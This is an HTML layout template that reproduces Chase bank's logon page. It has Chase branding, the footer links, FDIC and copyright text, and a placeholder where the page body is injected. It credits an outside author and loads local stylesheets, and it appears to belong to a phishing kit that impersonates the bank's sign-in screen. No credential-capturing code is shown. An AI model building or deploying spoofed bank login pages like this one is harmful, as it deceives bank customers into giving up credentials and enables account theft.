<!DOCTYPE html>
<html lang="en" class="no-js">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <meta name="author" content="Vince rex">

    <title>{{title}}</title>
    <!--<link href="css/bootstrap.min.css" rel="stylesheet" type="text/css">-->
    <link href="/css/blue-ui.css" rel="stylesheet" type="text/css">
    <link href="/css/logon.css" rel="stylesheet" type="text/css">
    <link href="/css/lucas.css" rel="stylesheet" type="text/css">
    <!--<script type="text/javascript" src="/js/boot.js"></script>-->

</head>

<body style="overflow-x: hidden; overflow-y: auto; height: 100%" data-has-view="true">
<div data-is-view="true">
    <div class="homepage" tabindex="-1">
        <!--<div class="toggle-aria-hidden" id="sitemessage" role="region" aria-labelledby="site-messages-heading" aria-hidden="true" data-has-view="true">-->
            <!--<div data-is-view="true">-->
                <!--<div id="siteMessageAda" aria-live="polite">-->
                    <!--<h2 class="util accessible-text" id="site-messages-heading" data-attr="LOGON_SITE_MESSAGES.noSiteMessagesAda">-->
                        <!--You have no more site alerts-->
                    <!--</h2>-->
                <!--</div>-->
            <!--</div>-->
        <!--</div>-->
        <header class="toggle-aria-hidden" id="logon-summary-menu" data-has-view="true">
            <div class="logon header jpui transparent navigation bar" data-is-view="true">
                <div>
                    <a href="/" data-attr="LOGON_SUMMARY_MENU.requestChaseHomepage">
                        <div class="chase logo"></div>
                        <span class="util accessible-text" data-attr="LOGON_SUMMARY_MENU.chaseLogoAda">
                            Chase.com homepage
                        </span>
                    </a>
                </div>
            </div>
        </header>
        <main id="logon-content" data-has-view="true">
            {{{body}}}
        </main>

        <footer class="logon-footer" id="logon-footer" data-has-view="true">
            <div class="footer-container" data-is-view="true" style="position: static;">
                <div class="container">
                    <div class="social-links row">
                        <div class="col-xs-12">
                            <span class="follow-us-text">Follow us:</span>
                            <ul class="icon-links">
                                <li class="facebook">
                                    <a href="#" data-attr="LOGON_FOOTER_MENU.requestChaseFacebook">
                                        <i class="jpui facebook icon footer" aria-hidden="true"></i>
                                        <span class="util accessible-text" data-attr="LOGON_FOOTER_MENU.requestChaseFacebookAda">Facebook</span>
                                        <span class="util accessible-text" data-attr="LOGON_FOOTER_MENU.opensDialogAda">: Opens dialog</span>
                                    </a>
                                </li>
                                <li class="instagram">
                                    <a href="#" data-attr="LOGON_FOOTER_MENU.requestChaseInstagram">
                                        <i class="jpui instagram icon footer" aria-hidden="true"></i>
                                        <span class="util accessible-text" data-attr="LOGON_FOOTER_MENU.requestChaseInstagramAda">Instagram</span>
                                        <span class="util accessible-text" data-attr="LOGON_FOOTER_MENU.opensDialogAda">
                                            : Opens dialog
                                        </span>
                                    </a>
                                </li>
                                <li class="twitter"><a href="#" data-attr="LOGON_FOOTER_MENU.requestChaseTwitter">
                                    <i class="jpui twitter icon footer" aria-hidden="true"></i>
                                    <span class="util accessible-text" data-attr="LOGON_FOOTER_MENU.requestChaseTwitterAda">Twitter</span>
                                    <span class="util accessible-text" data-attr="LOGON_FOOTER_MENU.opensDialogAda">: Opens dialog</span>
                                </a>
                                </li>
                                <li class="youtube"><a href="#" data-attr="LOGON_FOOTER_MENU.requestChaseYouTube">
                                    <i class="jpui youtube icon footer" aria-hidden="true"></i>
                                    <span class="util accessible-text" data-attr="LOGON_FOOTER_MENU.requestChaseYouTubeAda">YouTube</span>
                                    <span class="util accessible-text" data-attr="LOGON_FOOTER_MENU.opensDialogAda">: Opens dialog</span>
                                </a>
                                </li>
                                <li class="linkedin"><a href="#" data-attr="LOGON_FOOTER_MENU.requestChaseLinkedIn">
                                    <i class="jpui linkedin icon footer" aria-hidden="true"></i>
                                    <span class="util accessible-text" data-attr="LOGON_FOOTER_MENU.requestChaseLinkedInAda">LinkedIn</span>
                                    <span class="util accessible-text" data-attr="LOGON_FOOTER_MENU.opensDialogAda">: Opens dialog
                                    </span>
                                </a>
                                </li>
                            </ul>
                        </div>
                    </div>
                    <div class="footer-links row">
                        <div class="col-xs-12">
                            <ul>
                                <li>
                                    <a href="#" data-attr="LOGON_FOOTER_MENU.requestContactUs">Contact us</a>
                                </li>
                                <li>
                                    <a href="#" data-attr="LOGON_FOOTER_MENU.requestPrivacyNotice">Privacy</a>
                                </li>
                                <li>
                                    <a href="#" data-attr="LOGON_FOOTER_MENU.requestSecurity">Security</a>
                                </li>
                                <li>
                                    <a href="#" data-attr="LOGON_FOOTER_MENU.requestTermsOfUse">Terms of use</a>
                                </li>
                                <li>
                                    <a href="#" data-attr="LOGON_FOOTER_MENU.requestAccessibility">Our commitment to accessibility</a>
                                </li>
                                <li>
                                    <a href="#" data-attr="LOGON_FOOTER_MENU.requestMortgageLoanOriginators">SAFE Act: Chase Mortgage Loan Originators</a>
                                </li>
                                <li>
                                    <a href="#" data-attr="LOGON_FOOTER_MENU.requestHomeMortgageDisclosureAct">Fair Lending</a>
                                </li>
                                <li>
                                    <a href="#" data-attr="LOGON_FOOTER_MENU.requestAboutChase">About Chase</a>
                                </li>
                                <li>
                                    <a href="#" data-attr="LOGON_FOOTER_MENU.requestJpMorgan">J.P. Morgan</a>
                                </li>
                                <li>
                                    <a href="#" data-attr="LOGON_FOOTER_MENU.requestJpMorganChaseCo">JPMorgan Chase &amp; Co.</a>
                                </li>
                                <li>
                                    <a href="#" data-attr="LOGON_FOOTER_MENU.requestCareers">Careers</a>
                                </li>
                                <li>
                                    <a href="#" data-attr="LOGON_FOOTER_MENU.requestEspanol" lang="es">Español</a>
                                </li>
                                <li>
                                    <a href="#" data-attr="LOGON_FOOTER_MENU.requestChaseCanada">Chase Canada</a>
                                </li>
                                <li>
                                    <a href="#" data-attr="LOGON_FOOTER_MENU.requestSiteMap">Site map</a>
                                </li>
                                <li>Member FDIC</li>
                                <li>
                                    <i class="jpui equal-housing-lender icon" aria-hidden="true"></i>
                                    Equal Housing Lender
                                </li>
                                <li class="copyright-label">
                                    © 2017 JPMorgan Chase &amp; Co.
                                </li>
                            </ul>
                        </div>
                    </div>
                    <div class="row galaxy-footer">
                        <div class="col-xs-10 col-xs-offset-1">
                            <p class="NOTE">
                                <span></span>
                                <br>
                                <span class="copyright-label">© 2017 JPMorgan Chase &amp; Co.</span>
                                <br>
                                <a class="NOTELINK" href="#" data-attr="LOGON_FOOTER_MENU.requestPrivacyNotice">
                                    Privacy
                                    <i class="jpui progressright icon end-icon" aria-hidden="true"></i>
                                </a>
                                <br>
                                <a href="#" data-attr="LOGON_FOOTER_MENU.requestAccessibility">
                                    Our commitment to accessibility
                                    <i class="jpui progressright icon end-icon" aria-hidden="true"></i>
                                </a>
                            </p>
                        </div>
                    </div>
                </div>
            </div>
        </footer>
    </div>
    <div id="languageSupportDisclaimer"></div>
    <div id="overlay" data-has-view="true"></div>
    <div id="signoutModal"></div>
    <div id="siteExitWarning"></div>
    <div id="serviceErrorModal"></div>
    <div id="sessionTimeoutModal"></div>
</div>

</body>
</html>
